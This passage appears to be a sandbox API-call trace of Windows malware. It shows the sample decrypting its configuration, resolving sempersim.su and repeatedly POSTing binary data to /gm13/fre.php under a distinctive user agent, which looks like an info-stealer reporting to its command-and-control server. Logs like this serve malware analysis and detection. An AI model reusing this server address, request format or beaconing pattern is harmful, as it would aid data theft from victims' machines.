(lpLibFileName="ADVAPI32") returned 0x77420000 [0096.631] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6430e0, pdwDataLen=0x19fcfc | out: pbData=0x6430e0, pdwDataLen=0x19fcfc) returned 1 [0096.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0096.632] CryptDestroyKey (hKey=0x62d710) returned 1 [0096.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0096.633] CryptReleaseContext (hProv=0x63b760, dwFlags=0x0) returned 1 [0096.633] GetProcessHeap () returned 0x620000 [0096.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0096.634] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0096.634] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0096.634] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0096.635] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0096.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0096.635] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0096.636] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0096.636] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0096.636] GetProcessHeap () returned 0x620000 [0096.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0096.636] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0096.636] GetProcessHeap () returned 0x620000 [0096.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0096.637] GetProcessHeap () returned 0x620000 [0096.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0096.637] GetProcessHeap () returned 0x620000 [0096.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6430e0 | out: hHeap=0x620000) returned 1 [0096.637] GetProcessHeap () returned 0x620000 [0096.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642fc0 [0096.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0096.638] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0096.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0096.643] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0096.648] GetProcessHeap () returned 0x620000 [0096.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0096.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0096.649] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0096.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0096.650] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0096.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0096.651] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0096.651] GetProcessHeap () returned 0x620000 [0096.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0096.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0096.652] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642fc0, pdwDataLen=0x19fcfc | out: pbData=0x642fc0, pdwDataLen=0x19fcfc) returned 1 [0096.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0096.653] CryptDestroyKey (hKey=0x62d710) returned 1 [0096.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0096.653] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0096.653] GetProcessHeap () returned 0x620000 [0096.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0096.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0096.654] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0096.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0096.655] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0096.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0096.656] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0096.656] GetProcessHeap () returned 0x620000 [0096.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0096.656] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c0f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0096.657] GetProcessHeap () returned 0x620000 [0096.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b520 [0096.657] socket (af=2, type=1, protocol=6) returned 0x280 [0096.658] connect (s=0x280, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0096.710] FreeAddrInfoW (pAddrInfo=0x63c0f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0096.710] GetProcessHeap () returned 0x620000 [0096.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bba0 [0096.710] GetProcessHeap () returned 0x620000 [0096.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0096.711] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0096.711] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0096.711] GetProcessHeap () returned 0x620000 [0096.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x636288 [0096.711] GetProcessHeap () returned 0x620000 [0096.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0096.712] GetProcessHeap () returned 0x620000 [0096.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643200 [0096.712] GetProcessHeap () returned 0x620000 [0096.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0096.712] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0096.713] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0096.713] GetProcessHeap () returned 0x620000 [0096.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x636340 [0096.713] GetProcessHeap () returned 0x620000 [0096.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0096.713] send (s=0x280, buf=0x636340*, len=237, flags=0) returned 237 [0096.714] send (s=0x280, buf=0x6421e0*, len=159, flags=0) returned 159 [0096.714] GetProcessHeap () returned 0x620000 [0096.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0096.714] recv (in: s=0x280, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0098.593] GetProcessHeap () returned 0x620000 [0098.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636340 | out: hHeap=0x620000) returned 1 [0098.593] GetProcessHeap () returned 0x620000 [0098.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0098.593] GetProcessHeap () returned 0x620000 [0098.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636288 | out: hHeap=0x620000) returned 1 [0098.594] GetProcessHeap () returned 0x620000 [0098.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bba0 | out: hHeap=0x620000) returned 1 [0098.594] closesocket (s=0x280) returned 0 [0098.595] GetProcessHeap () returned 0x620000 [0098.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b520 | out: hHeap=0x620000) returned 1 [0098.595] GetProcessHeap () returned 0x620000 [0098.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0098.595] GetProcessHeap () returned 0x620000 [0098.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0098.596] GetProcessHeap () returned 0x620000 [0098.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0098.596] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11d0) returned 0x280 [0098.599] Sleep (dwMilliseconds=0xea60) [0098.618] GetProcessHeap () returned 0x620000 [0098.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643638 [0098.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0098.624] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0098.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0098.728] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0098.736] GetProcessHeap () returned 0x620000 [0098.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fd8 [0098.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0098.737] CryptImportKey (in: hProv=0x63ba08, pbData=0x638fd8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0098.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0098.738] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0098.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0098.739] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0098.739] GetProcessHeap () returned 0x620000 [0098.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fd8 | out: hHeap=0x620000) returned 1 [0098.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0098.740] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643638, pdwDataLen=0x19fcfc | out: pbData=0x643638, pdwDataLen=0x19fcfc) returned 1 [0098.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0098.748] CryptDestroyKey (hKey=0x62d710) returned 1 [0098.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0098.749] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0098.749] GetProcessHeap () returned 0x620000 [0098.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0098.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0098.750] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0098.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0098.751] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0098.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0098.752] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0098.753] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0098.753] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0098.753] GetProcessHeap () returned 0x620000 [0098.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0098.753] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0098.754] GetProcessHeap () returned 0x620000 [0098.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0098.754] GetProcessHeap () returned 0x620000 [0098.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0098.754] GetProcessHeap () returned 0x620000 [0098.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643638 | out: hHeap=0x620000) returned 1 [0098.754] GetProcessHeap () returned 0x620000 [0098.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642e58 [0098.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0098.755] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0098.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0098.767] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b980) returned 1 [0098.781] GetProcessHeap () returned 0x620000 [0098.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0098.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0098.783] CryptImportKey (in: hProv=0x63b980, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0098.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0098.784] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0098.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0098.785] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0098.785] GetProcessHeap () returned 0x620000 [0098.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0098.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0098.787] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642e58, pdwDataLen=0x19fcfc | out: pbData=0x642e58, pdwDataLen=0x19fcfc) returned 1 [0098.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0098.789] CryptDestroyKey (hKey=0x62d190) returned 1 [0098.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0098.794] CryptReleaseContext (hProv=0x63b980, dwFlags=0x0) returned 1 [0098.794] GetProcessHeap () returned 0x620000 [0098.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0098.795] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0098.795] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0098.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0098.796] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0098.797] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0098.797] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0098.797] GetProcessHeap () returned 0x620000 [0098.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0098.798] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c550*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0098.801] GetProcessHeap () returned 0x620000 [0098.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b660 [0098.801] socket (af=2, type=1, protocol=6) returned 0x284 [0098.801] connect (s=0x284, name=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0098.847] FreeAddrInfoW (pAddrInfo=0x63c550*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0098.847] GetProcessHeap () returned 0x620000 [0098.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0098.847] GetProcessHeap () returned 0x620000 [0098.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0098.849] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0098.850] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0098.850] GetProcessHeap () returned 0x620000 [0098.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x636288 [0098.850] GetProcessHeap () returned 0x620000 [0098.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0098.851] GetProcessHeap () returned 0x620000 [0098.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642fc0 [0098.851] GetProcessHeap () returned 0x620000 [0098.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0098.852] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0098.853] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0098.853] GetProcessHeap () returned 0x620000 [0098.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x636340 [0098.853] GetProcessHeap () returned 0x620000 [0098.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0098.853] send (s=0x284, buf=0x636340*, len=237, flags=0) returned 237 [0098.854] send (s=0x284, buf=0x6421e0*, len=159, flags=0) returned 159 [0098.854] GetProcessHeap () returned 0x620000 [0098.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0098.855] recv (in: s=0x284, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0100.621] GetProcessHeap () returned 0x620000 [0100.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636340 | out: hHeap=0x620000) returned 1 [0100.622] GetProcessHeap () returned 0x620000 [0100.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0100.623] GetProcessHeap () returned 0x620000 [0100.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636288 | out: hHeap=0x620000) returned 1 [0100.623] GetProcessHeap () returned 0x620000 [0100.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0100.623] closesocket (s=0x284) returned 0 [0100.624] GetProcessHeap () returned 0x620000 [0100.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b660 | out: hHeap=0x620000) returned 1 [0100.624] GetProcessHeap () returned 0x620000 [0100.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0100.624] GetProcessHeap () returned 0x620000 [0100.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642e58 | out: hHeap=0x620000) returned 1 [0100.625] GetProcessHeap () returned 0x620000 [0100.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0100.625] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xffc) returned 0x284 [0100.626] Sleep (dwMilliseconds=0xea60) [0100.651] GetProcessHeap () returned 0x620000 [0100.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643200 [0100.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0100.652] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0100.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0100.662] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b980) returned 1 [0100.673] GetProcessHeap () returned 0x620000 [0100.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0100.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0100.674] CryptImportKey (in: hProv=0x63b980, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0100.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0100.675] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0100.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0100.676] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0100.676] GetProcessHeap () returned 0x620000 [0100.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0100.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0100.677] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643200, pdwDataLen=0x19fcfc | out: pbData=0x643200, pdwDataLen=0x19fcfc) returned 1 [0100.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0100.678] CryptDestroyKey (hKey=0x62d710) returned 1 [0100.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0100.679] CryptReleaseContext (hProv=0x63b980, dwFlags=0x0) returned 1 [0100.679] GetProcessHeap () returned 0x620000 [0100.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0100.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0100.680] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0100.680] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0100.681] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0100.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0100.681] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0100.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0100.711] StrStrA 